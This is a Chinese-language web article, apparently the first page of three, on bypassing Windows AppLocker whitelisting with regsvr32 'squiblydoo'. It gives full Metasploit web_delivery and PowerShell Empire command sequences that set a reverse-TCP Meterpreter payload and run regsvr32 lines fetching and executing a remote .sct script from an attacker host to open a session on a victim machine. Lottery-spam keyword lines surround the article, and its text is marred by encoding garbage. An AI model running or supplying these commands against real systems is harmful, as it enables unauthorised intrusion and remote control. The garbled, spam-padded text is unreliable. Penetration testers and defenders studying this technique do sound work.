手机上怎么买彩票双色球 微信上有人推荐买彩票 能合买彩票的平台 夫妻买彩票狂中30亿 买彩票心态 买彩票就买大乐透开奖结果 哪个平台买彩票安全吗 买彩票有买一个号的吗 怎么看走势图买彩票 如何在电脑上买彩票 美国几岁可以买彩票? 福彩工作人员买彩票 彩客网买彩票 能在微信上买彩票吗 怎么买彩票容易中

通过regsrv32.exe绕过Applocker应用程序白名单的多种方法

来源£º本站整理 作者£º佚名 时间£º2019-04-30 TAG£º 我要投稿

在大型组织的安全领域中£¬AppLocker正在扮演越来越重要的角色¡£应用AppLocker规则可以显著降低企业的安全风险£¬AppLocker规则可以应用于目标应用£¬这些规则也是构成AppLocker策略的基本组件¡£
AppLocker规则介绍
规则集合£¨Rule Collection£©
AppLocker控制台以规则集合作为组织单元£¬这些集合包括可执行文件¡¢脚本¡¢Windows安装文件¡¢封装的应用和应用安装包以及DLL文件¡£这些规则可以让我们轻松区分开不同类型的应用¡£
规则条件£¨Rule Condition£©
规则条件可以帮助AppLocker识别哪些应用对应哪些规则¡£三个主要的规则条件分别为应用发布者¡¢路径以及文件哈希¡£
文件路径条件
以应用在?#20302;?#20013;的路径作为识别依据£»
文件发布者条件
以应用的属性或者数字签名作为识别依据£»
文件哈希条件
以应用的哈希值作为识别依据£»
看似这些强大的规则让黑客攻击无处遁形£¬但不幸的是£¬对于防御者来说£¬除了默认规则以外£¬AppLocker还涉及到许多自定义配置£¬而黑客正是利用这些配置作为突破口的¡£本文将介绍通过 regsrv32.exe绕过Applocker应用程序白名单的多种方法¡£
Regsvr32介绍
Regsvr32全称是Microsoft Register Server¡£它是windows的命令行实用工具¡£虽然regsvr32有时会引起一些莫名其妙的问题£¬但作为Windows?#20302;?#25991;件£¬它仍是一个重要的文件¡£该文件位于C:\Windows的子文件夹中£¬该文件能?#36824;?#23519;¡¢跟踪和影响其他程序¡£由于它是.exe格式£¬所以主要被用于在Windows文件扩展名中注册和注销程序£¬它的进程可以广泛地协助OLE£¨对象链接和嵌入£©£¬DLL£¨数据链接库£©和OCX£¨ActiveX控件模块£©¡£上述流程在后台工作£¬可以通过任务管理器查看¡£终止£¬它是微软最受信任的文件之一¡£
regsvr32工作原理
当你在regsvr32中注册DLL文件时£¬与regsvr32关联的程序的信息将添加到Windows中¡£然后访问这些信息£¬以了解程序数据的位置以及如何与程序数据进行交互¡£在注册DLL文件时£¬信息会被添加到目录的中央£¬以便windows可以使用它¡£这些文件的整个路径都有可执行代码£¬由于这些文件£¬windows可以调用特定的函数¡£这些文件非常方便£¬当软件更新时£¬这些文件会自动调用更新后的版本¡£简而言之£¬它有助于避免软件的版本问题¡£通常£¬除了注册和注销DLL文件外£¬通常不使用此文件¡£
RegSvr32.exe具有以下命令行选项£º
语法£ºRegsvr32 [/s][/u] [/n] [/i[:cmdline]]
· /u£º注销服务器£»
· /i£º调用DllInstall传递一个可选的[cmdline]£¬当它与/u一起使用时£¬它会调用dll uninstall¡£
· /n£º不要调用DllRegisterServer£¬?#25628;?#39033;必须与/i一起使用
· / s £º沉默£¬不显示消息框£»
要了解更多信息£¬请访问这里¡£
Web传递(Web Delivery)
此模块会快速启动一个提供有效载荷的web服务器£¬所提供的命令将允许?#30053;?#21644;执行有效载荷¡£它将通过指定的脚本语?#36234;?#37322;器或通过regsvr32.exe的“squiblydoo”来绕过应用程序白名单¡£该模块的主要目的是当攻击者不得不手动输入命令时£¬在目标设备上快速建立会话£¬例如命令注入¡£
Regsvr32使用“squiblydoo”技术来绕过应用程序白名单£¬签名的Microsoft二进制文件Regsvr32能够请求.sct文件£¬然后在其中执行包含的PowerShell命令¡£两个web请求(即£¬ .sct文件和PowerShell?#30053;?#25110;执行)都可以发生在同一个端口上¡£PSH£¨Binary£©”会将文件写入磁盘£¬允许自定义二进制文件被?#30053;?#25110;执行¡£
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 3
msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.109
msf exploit (web_delivery)>set srvhost 192.168.1.109
msf exploit (web_delivery)>exploit
一旦使用这些文本开始运?#26032;?#27934;£¬你将拥有一个为自定义的URL£¬就可以在受害者电脑的命令提示符中运行该URL¡£
regsvr32 /s /n /u /i://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll
在命令执行后按回?#23548;ü£?#23601;将进行会话¡£输入“sysinfo”以获取目标电脑的信息¡£
PowerShell Empire
Empire是一款类似Metasploit的渗透测试框架£¬基于python编写£¬Empire是一个?#30475;?#30340;PowerShell后开发代理£¬建立在密码安全通信和灵活的架构上¡£Empire实现了无需powershell.exe即可运行PowerShell代理的功能£¬从键盘记录器到Mimikatz等快速部署的后期开发模块£¬以及适应性通信以避开网络检测£¬所有这些都包含在以可用性为重点的框架中¡£
在PowerShell Empire方法中£¬我们必须将.sct tacks与Metasploit配对£¬但是在这种方法中£¬我们将使用Empire框架¡£它完全基于python的PowerShell windows代理£¬这使得它非常有用¡£
如下所示£¬启动Empire框架后£¬输入listener命令£¬以检查是否存在反侦查进程¡£
uselistner http
set Host //192.168.1.109
execute
使用上述命令£¬你将拥有一个反侦查进程¡£输入back命令£¬就可以退出反侦查进程£¬以便启动PowerShell¡£
一旦你退出listener命令£¬就需要使用一个漏洞来创建恶意文件¡£在Empire中£¬stage代表?#27426;?#20195;码£¬它允许我们的恶意代码通过受感染的主机上的代理运行¡£这意味着要创建一个漏洞£¬我们将不得不通过usestager¡£命令如下£º
usestager windows/launcher_sct
set listener http
execute
执行命令后£¬usestager将在/ tmp中创建一个launcher.sct¡£现在要获得会话£¬就必须通过输入以下内容来启动python服务器£º
python -m SimpleHTTPServer 8080
当服务器启动时£¬剩下的唯一步骤就是在受害者的电脑中执行我们的恶意软件¡£此时£¬就要在命令提示符中输入以下命令£º
regsvr / s / n / u /i://192.168.1.109:8080/tmp/launcher.sct scrobj.dll
在上面的命令中£¬我们使用了端口8080£¬这是因为我们的python服务器在同一个端口上被激活¡£
执行上述操作后£¬你将收到一个会话£º

[1] [2] [3]  下一页

¡¾声明¡¿:黑吧安全网(http://www.rliwo.live)登载此文出于传递更多信息之目的£¬并不代表本站赞同其观点?#25237;?#20854;真实性负责£¬仅适于网络安全技术爱好者学习研究使用£¬学习中请遵循国家相关法律法规¡£如有问题请联系我们£¬联系邮箱[email protected]£¬我们会在最短的时间内进行处理¡£
  • 最新更新
    • 相关阅读
      • 本类?#35753;?/li>
        • 最近?#30053;?/li>
        ¹ºÂò²ÊƱȨÍþÍøÖ·
        手机上怎么买彩票双色球 微信上有人推荐买彩票 能合买彩票的平台 夫妻买彩票狂中30亿 买彩票心态 买彩票就买大乐透开奖结果 哪个平台买彩票安全吗 买彩票有买一个号的吗 怎么看走势图买彩票 如何在电脑上买彩票 美国几岁可以买彩票? 福彩工作人员买彩票 彩客网买彩票 能在微信上买彩票吗 怎么买彩票容易中